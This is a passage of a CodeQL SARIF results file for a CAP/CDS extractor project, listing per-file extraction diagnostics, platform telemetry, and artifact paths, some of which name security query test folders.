Location":{"artifactLocation":{"uri":"extractors/cds/tools/src/codeql.ts","uriBaseId":"%SRCROOT%","index":50}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/packageManager/index.ts","uriBaseId":"%SRCROOT%","index":60}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/version.test.ts","uriBaseId":"%SRCROOT%","index":74}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/logging/cdsExtractorLog.ts","uriBaseId":"%SRCROOT%","index":55}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/command.test.ts","uriBaseId":"%SRCROOT%","index":67}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/constants.ts","uriBaseId":"%SRCROOT%","index":51}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/logging/performanceTrackingIntegration.test.ts","uriBaseId":"%SRCROOT%","index":86}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/packageManager/types.ts","uriBaseId":"%SRCROOT%","index":62}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/validator.test.ts","uriBaseId":"%SRCROOT%","index":73}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/parser/monorepo-support.test.ts","uriBaseId":"%SRCROOT%","index":77}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/parser/build-graph.test.ts","uriBaseId":"%SRCROOT%","index":75}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/utils.ts","uriBaseId":"%SRCROOT%","index":64}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/parser/types.ts","uriBaseId":"%SRCROOT%","index":49}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/compile.ts","uriBaseId":"%SRCROOT%","index":38}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/parser/project-aware-compilation.test.ts","uriBaseId":"%SRCROOT%","index":78}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/parser/index.ts","uriBaseId":"%SRCROOT%","index":48}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/parser/subdirectory-detection.test.ts","uriBaseId":"%SRCROOT%","index":80}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/retry.test.ts","uriBaseId":"%SRCROOT%","index":72}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/jest.setup.ts","uriBaseId":"%SRCROOT%","index":66}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/logging/cdsExtractorLog.test.ts","uriBaseId":"%SRCROOT%","index":85}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/diagnostics.test.ts","uriBaseId":"%SRCROOT%","index":82}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/retry.ts","uriBaseId":"%SRCROOT%","index":42}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/utils.test.ts","uriBaseId":"%SRCROOT%","index":94}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/types.ts","uriBaseId":"%SRCROOT%","index":43}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/index.ts","uriBaseId":"%SRCROOT%","index":40}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/project.test.ts","uriBaseId":"%SRCROOT%","index":71}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/parser/self-parser.test.ts","uriBaseId":"%SRCROOT%","index":79}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/graph.test.ts","uriBaseId":"%SRCROOT%","index":69}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/environment.test.ts","uriBaseId":"%SRCROOT%","index":83}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/packageManager/versionResolver.test.ts","uriBaseId":"%SRCROOT%","index":93}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/environment.ts","uriBaseId":"%SRCROOT%","index":53}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/version.ts","uriBaseId":"%SRCROOT%","index":45}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/packageManager/versionResolver.ts","uriBaseId":"%SRCROOT%","index":63}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/packageManager/types.test.ts","uriBaseId":"%SRCROOT%","index":92}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/packageManager/cacheInstaller.ts","uriBaseId":"%SRCROOT%","index":59}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/parser/functions.ts","uriBaseId":"%SRCROOT%","index":46}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/filesystem.ts","uriBaseId":"%SRCROOT%","index":54}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/codeql.test.ts","uriBaseId":"%SRCROOT%","index":81}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/filesystem.test.ts","uriBaseId":"%SRCROOT%","index":84}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"scripts/CreateTestsFromYaml.py","uriBaseId":"%SRCROOT%","index":649}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/python","index":3},"properties":{"formattedMessage":{"text":""}}},{"message":{"text":"On the Linux (amd64; 6.11.0-1018-azure) platform.","markdown":"On the Linux (amd64; 6.11.0-1018-azure) platform."},"level":"none","timeUtc":"2026-01-08T17:45:48.269530048Z","descriptor":{"id":"cli/platform","index":4},"properties":{"attributes":{"arch":"amd64","name":"Linux","version":"6.11.0-1018-azure"},"visibility":{"statusPage":false,"telemetry":true}}},{"message":{"text":""},"level":"none","timeUtc":"2026-01-08T17:45:39.799Z","descriptor":{"id":"codeql-action/zstd-availability","index":5},"properties":{"attributes":{"available":true,"foundZstdBinary":true,"version":{"type":"gnu","version":"1.35"}},"visibility":{"statusPage":false,"telemetry":true}}}],"executionSuccessful":true}],"artifacts":[{"location":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2}},{"location":{"uri":"javascript/heuristic-models/tests/Sources/test.js","uriBaseId":"%SRCROOT%","index":3}},{"location":{"uri":".cds-extractor-cache/cds-5821ca4a7405c17bc03fe9c833aa52212563b6d17f24eb61f8af574bf1095ef1/node_modules/@sap/cds-dk/node_modules/encoding/node_modules/iconv-lite/.idea/codeStyles/codeStyleConfig.xml","uriBaseId":"%SRCROOT%","index":4}},{"location":{"uri":".cds-extractor-cache/cds-5821ca4a7405c17bc03fe9c833aa52212563b6d17f24eb61f8af574bf1095ef1/node_modules/@sap/cds-dk/node_modules/encoding/node_modules/iconv-lite/.idea/codeStyles/Project.xml","uriBaseId":"%SRCROOT%","index":5}},{"location":{"uri":".cds-extractor-cache/cds-5821ca4a7405c17bc03fe9c833aa52212563b6d17f24eb61f8af574bf1095ef1/node_modules/@sap/cds-dk/node_modules/encoding/node_modules/iconv-lite/.idea/modules.xml","uriBaseId":"%SRCROOT%","index":6}},{"location":{"uri":".cds-extractor-cache/cds-5821ca4a7405c17bc03fe9c833aa52212563b6d17f24eb61f8af574bf1095ef1/node_modules/@sap/cds-dk/node_modules/encoding/node_modules/iconv-lite/.idea/inspectionProfiles/Project_Default.xml","uriBaseId":"%SRCROOT%","index":7}},{"location":{"uri":".cds-extractor-cache/cds-5821ca4a7405c17bc03fe9c833aa52212563b6d17f24eb61f8af574bf1095ef1/node_modules/@sap/cds-dk/node_modules/encoding/node_modules/iconv-lite/.idea/vcs.xml","uriBaseId":"%SRCROOT%","index":8}},{"location":{"uri":".cds-extractor-cache/cds-5821ca4a7405c17bc03fe9c833aa52212563b6d17f24eb61f8af574bf1095ef1/node_modules/@sap/cds-dk/node_modules/xml-js/bin/test.xml","uriBaseId":"%SRCROOT%","index":9}},{"location":{"uri":".cds-extractor-cache/cds-d8a826697297b88e55595779ee2ab973e23d88ec44cdd9b66e0b3b95582ffc2d/node_modules/@sap/cds-dk/node_modules/xml-js/bin/test.xml","uriBaseId":"%SRCROOT%","index":10}},{"location":{"uri":".github/codeql/codeql-config.yaml","uriBaseId":"%SRCROOT%","index":11}},{"location":{"uri":".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":12}},{"location":{"uri":".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml","uriBaseId":"%SRCROOT%","index":13}},{"location":{"uri":".github/codeql/extensions/javascript/frameworks/xsjs/ext/ext/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":14}},{"location":{"uri":".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml","uriBaseId":"%SRCROOT%","index":15}},{"location":{"uri":".github/codeql/extensions/javascript/frameworks/xsjs/ext/ext/qlpack.yml","uriBaseId":"%SRCROOT%","index":16}},{"location":{"uri":".github/codeql/extensions/javascript/frameworks/xsjs/ext/ext/xsjs.model.yml","uriBaseId":"%SRCROOT%","index":17}},{"location":{"uri":".github/codeql/extensions/javascript/heuristic-models/ext/ext/additional-sources.model.yml","uriBaseId":"%SRCROOT%","index":18}},{"location":{"uri":".github/codeql/extensions/javascript/heuristic-models/ext/ext/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":19}},{"location":{"uri":".github/codeql/extensions/javascript/heuristic-models/ext/ext/qlpack.yml","uriBaseId":"%SRCROOT%","index":20}},{"location":{"uri":".github/workflows/cds-extractor-dist-bundle.yml","uriBaseId":"%SRCROOT%","index":21}},{"location":{"uri":".github/workflows/code_scanning.yml","uriBaseId":"%SRCROOT%","index":22}},{"location":{"uri":".github/workflows/codeql-ql.yml","uriBaseId":"%SRCROOT%","index":23}},{"location":{"uri":".github/workflows/run-codeql-unit-tests-javascript.yml","uriBaseId":"%SRCROOT%","index":24}},{"location":{"uri":".github/workflows/update-codeql.yml","uriBaseId":"%SRCROOT%","index":25}},{"location":{"uri":"cds-extractor-marker.js","uriBaseId":"%SRCROOT%","index":26}},{"location":{"uri":"extractors/cds/codeql-extractor.yml","uriBaseId":"%SRCROOT%","index":27}},{"location":{"uri":"codeql-workspace.yml","uriBaseId":"%SRCROOT%","index":28}},{"location":{"uri":"extractors/cds/tools/.prettierrc.js","uriBaseId":"%SRCROOT%","index":29}},{"location":{"uri":"extractors/cds/tools/cds-extractor.ts","uriBaseId":"%SRCROOT%","index":30}},{"location":{"uri":"extractors/cds/tools/dist/cds-extractor.bundle.js","uriBaseId":"%SRCROOT%","index":31}},{"location":{"uri":"extractors/cds/tools/esbuild.config.mjs","uriBaseId":"%SRCROOT%","index":32}},{"location":{"uri":"extractors/cds/tools/eslint.config.mjs","uriBaseId":"%SRCROOT%","index":33}},{"location":{"uri":"extractors/cds/tools/jest.config.js","uriBaseId":"%SRCROOT%","index":34}},{"location":{"uri":"extractors/cds/tools/package-lock.json","uriBaseId":"%SRCROOT%","index":35}},{"location":{"uri":"extractors/cds/tools/package.json","uriBaseId":"%SRCROOT%","index":36}},{"location":{"uri":"extractors/cds/tools/src/cds/compiler/command.ts","uriBaseId":"%SRCROOT%","index":37}},{"location":{"uri":"extractors/cds/tools/src/cds/compiler/compile.ts","uriBaseId":"%SRCROOT%","index":38}},{"location":{"uri":"extractors/cds/tools/src/cds/compiler/graph.ts","uriBaseId":"%SRCROOT%","index":39}},{"location":{"uri":"extractors/cds/tools/src/cds/compiler/index.ts","uriBaseId":"%SRCROOT%","index":40}},{"location":{"uri":"extractors/cds/tools/src/cds/compiler/project.ts","uriBaseId":"%SRCROOT%","index":41}},{"location":{"uri":"extractors/cds/tools/src/cds/compiler/retry.ts","uriBaseId":"%SRCROOT%","index":42}},{"location":{"uri":"extractors/cds/tools/src/cds/compiler/types.ts","uriBaseId":"%SRCROOT%","index":43}},{"location":{"uri":"extractors/cds/tools/src/cds/compiler/validator.ts","uriBaseId":"%SRCROOT%","index":44}},{"location":{"uri":"extractors/cds/tools/src/cds/compiler/version.ts","uriBaseId":"%SRCROOT%","index":45}},{"location":{"uri":"extractors/cds/tools/src/cds/parser/functions.ts","uriBaseId":"%SRCROOT%","index":46}},{"location":{"uri":"extractors/cds/tools/src/cds/parser/graph.ts","uriBaseId":"%SRCROOT%","index":47}},{"location":{"uri":"extractors/cds/tools/src/cds/parser/index.ts","uriBaseId":"%SRCROOT%","index":48}},{"location":{"uri":"extractors/cds/tools/src/cds/parser/types.ts","uriBaseId":"%SRCROOT%","index":49}},{"location":{"uri":"extractors/cds/tools/src/codeql.ts","uriBaseId":"%SRCROOT%","index":50}},{"location":{"uri":"extractors/cds/tools/src/constants.ts","uriBaseId":"%SRCROOT%","index":51}},{"location":{"uri":"extractors/cds/tools/src/diagnostics.ts","uriBaseId":"%SRCROOT%","index":52}},{"location":{"uri":"extractors/cds/tools/src/environment.ts","uriBaseId":"%SRCROOT%","index":53}},{"location":{"uri":"extractors/cds/tools/src/filesystem.ts","uriBaseId":"%SRCROOT%","index":54}},{"location":{"uri":"extractors/cds/tools/src/logging/cdsExtractorLog.ts","uriBaseId":"%SRCROOT%","index":55}},{"location":{"uri":"extractors/cds/tools/src/logging/index.ts","uriBaseId":"%SRCROOT%","index":56}},{"location":{"uri":"extractors/cds/tools/src/logging/statusReport.ts","uriBaseId":"%SRCROOT%","index":57}},{"location":{"uri":"extractors/cds/tools/src/logging/types.ts","uriBaseId":"%SRCROOT%","index":58}},{"location":{"uri":"extractors/cds/tools/src/packageManager/cacheInstaller.ts","uriBaseId":"%SRCROOT%","index":59}},{"location":{"uri":"extractors/cds/tools/src/packageManager/index.ts","uriBaseId":"%SRCROOT%","index":60}},{"location":{"uri":"extractors/cds/tools/src/packageManager/projectInstaller.ts","uriBaseId":"%SRCROOT%","index":61}},{"location":{"uri":"extractors/cds/tools/src/packageManager/types.ts","uriBaseId":"%SRCROOT%","index":62}},{"location":{"uri":"extractors/cds/tools/src/packageManager/versionResolver.ts","uriBaseId":"%SRCROOT%","index":63}},{"location":{"uri":"extractors/cds/tools/src/utils.ts","uriBaseId":"%SRCROOT%","index":64}},{"location":{"uri":"extractors/cds/tools/test/cds-extractor.test.ts","uriBaseId":"%SRCROOT%","index":65}},{"location":{"uri":"extractors/cds/tools/test/jest.setup.ts","uriBaseId":"%SRCROOT%","index":66}},{"location":{"uri":"extractors/cds/tools/test/src/cds/compiler/command.test.ts","uriBaseId":"%SRCROOT%","index":67}},{"location":{"uri":"extractors/cds/tools/test/src/cds/compiler/compile.test.ts","uriBaseId":"%SRCROOT%","index":68}},{"location":{"uri":"extractors/cds/tools/test/src/cds/compiler/graph.test.ts","uriBaseId":"%SRCROOT%","index":69}},{"location":{"uri":"extractors/cds/tools/test/src/cds/compiler/index.test.ts","uriBaseId":"%SRCROOT%","index":70}},{"location":{"uri":"extractors/cds/tools/test/src/cds/compiler/project.test.ts","uriBaseId":"%SRCROOT%","index":71}},{"location":{"uri":"extractors/cds/tools/test/src/cds/compiler/retry.test.ts","uriBaseId":"%SRCROOT%","index":72}},{"location":{"uri":"extractors/cds/tools/test/src/cds/compiler/validator.test.ts","uriBaseId":"%SRCROOT%","index":73}},{"location":{"uri":"extractors/cds/tools/test/src/cds/compiler/version.test.ts","uriBaseId":"%SRCROOT%","index":74}},{"location":{"uri":"extractors/cds/tools/test/src/cds/parser/build-graph.test.ts","uriBaseId":"%SRCROOT%","index":75}},{"location":{"uri":"extractors/cds/tools/test/src/cds/parser/files-to-compile.test.ts","uriBaseId":"%SRCROOT%","index":76}},{"location":{"uri":"extractors/cds/tools/test/src/cds/parser/monorepo-support.test.ts","uriBaseId":"%SRCROOT%","index":77}},{"location":{"uri":"extractors/cds/tools/test/src/cds/parser/project-aware-compilation.test.ts","uriBaseId":"%SRCROOT%","index":78}},{"location":{"uri":"extractors/cds/tools/test/src/cds/parser/self-parser.test.ts","uriBaseId":"%SRCROOT%","index":79}},{"location":{"uri":"extractors/cds/tools/test/src/cds/parser/subdirectory-detection.test.ts","uriBaseId":"%SRCROOT%","index":80}},{"location":{"uri":"extractors/cds/tools/test/src/codeql.test.ts","uriBaseId":"%SRCROOT%","index":81}},{"location":{"uri":"extractors/cds/tools/test/src/diagnostics.test.ts","uriBaseId":"%SRCROOT%","index":82}},{"location":{"uri":"extractors/cds/tools/test/src/environment.test.ts","uriBaseId":"%SRCROOT%","index":83}},{"location":{"uri":"extractors/cds/tools/test/src/filesystem.test.ts","uriBaseId":"%SRCROOT%","index":84}},{"location":{"uri":"extractors/cds/tools/test/src/logging/cdsExtractorLog.test.ts","uriBaseId":"%SRCROOT%","index":85}},{"location":{"uri":"extractors/cds/tools/test/src/logging/performanceTrackingIntegration.test.ts","uriBaseId":"%SRCROOT%","index":86}},{"location":{"uri":"extractors/cds/tools/test/src/logging/statusReport.test.ts","uriBaseId":"%SRCROOT%","index":87}},{"location":{"uri":"extractors/cds/tools/test/src/logging/types.test.ts","uriBaseId":"%SRCROOT%","index":88}},{"location":{"uri":"extractors/cds/tools/test/src/packageManager/cacheInstaller.test.ts","uriBaseId":"%SRCROOT%","index":89}},{"location":{"uri":"extractors/cds/tools/test/src/packageManager/index.test.ts","uriBaseId":"%SRCROOT%","index":90}},{"location":{"uri":"extractors/cds/tools/test/src/packageManager/projectInstaller.test.ts","uriBaseId":"%SRCROOT%","index":91}},{"location":{"uri":"extractors/cds/tools/test/src/packageManager/types.test.ts","uriBaseId":"%SRCROOT%","index":92}},{"location":{"uri":"extractors/cds/tools/test/src/packageManager/versionResolver.test.ts","uriBaseId":"%SRCROOT%","index":93}},{"location":{"uri":"extractors/cds/tools/test/src/utils.test.ts","uriBaseId":"%SRCROOT%","index":94}},{"location":{"uri":"extractors/cds/tools/tsconfig.json","uriBaseId":"%SRCROOT%","index":95}},{"location":{"uri":"extractors/cds/tools/validate-bundle.js","uriBaseId":"%SRCROOT%","index":96}},{"location":{"uri":"javascript/frameworks/cap/ext/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":97}},{"location":{"uri":"javascript/frameworks/cap/ext/qlpack.yml","uriBaseId":"%SRCROOT%","index":98}},{"location":{"uri":"javascript/frameworks/cap/lib/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":99}},{"location":{"uri":"javascript/frameworks/cap/lib/qlpack.yml","uriBaseId":"%SRCROOT%","index":100}},{"location":{"uri":"javascript/frameworks/cap/src/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":101}},{"location":{"uri":"javascript/frameworks/cap/test/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":102}},{"location":{"uri":"javascript/frameworks/cap/test/qlpack.yml","uriBaseId":"%SRCROOT%","index":103}},{"location":{"uri":"javascript/frameworks/cap/src/qlpack.yml","uriBaseId":"%SRCROOT%","index":104}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds","uriBaseId":"%SRCROOT%","index":105}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/model.cds.json","uriBaseId":"%SRCROOT%","index":106}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/package.json","uriBaseId":"%SRCROOT%","index":107}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/server.js","uriBaseId":"%SRCROOT%","index":108}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds","uriBaseId":"%SRCROOT%","index":109}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js","uriBaseId":"%SRCROOT%","index":110}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds","uriBaseId":"%SRCROOT%","index":111}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.js","uriBaseId":"%SRCROOT%","index":112}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service3.cds","uriBaseId":"%SRCROOT%","index":113}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service3.js","uriBaseId":"%SRCROOT%","index":114}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds","uriBaseId":"%SRCROOT%","index":115}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/model.cds.json","uriBaseId":"%SRCROOT%","index":116}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/package.json","uriBaseId":"%SRCROOT%","index":117}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/server.js","uriBaseId":"%SRCROOT%","index":118}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds","uriBaseId":"%SRCROOT%","index":119}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js","uriBaseId":"%SRCROOT%","index":120}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds","uriBaseId":"%SRCROOT%","index":121}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.js","uriBaseId":"%SRCROOT%","index":122}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/db/schema.cds","uriBaseId":"%SRCROOT%","index":123}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/model.cds.json","uriBaseId":"%SRCROOT%","index":124}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/server.js","uriBaseId":"%SRCROOT%","index":125}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/package.json","uriBaseId":"%SRCROOT%","index":126}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service1.cds","uriBaseId":"%SRCROOT%","index":127}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service1.js","uriBaseId":"%SRCROOT%","index":128}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/en